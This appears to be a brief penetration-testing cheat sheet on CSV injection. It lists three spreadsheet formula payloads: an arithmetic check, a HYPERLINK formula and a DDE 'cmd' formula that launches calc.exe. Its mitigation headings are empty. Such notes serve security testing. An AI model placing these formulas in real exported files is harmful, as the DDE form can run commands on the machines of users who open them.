CSV Injection
Testing
# Simple payload to confirm the existence of CSV Injection
=1336+1
# Insert an arbitrary link into the document.
=HYPERLINK("https://parzival.sh")
# Spawn calc.exe, this will require security settings disabled in Excel.
=cmd|' /C calc'!xxxMitigations
Considerations
References
Last updated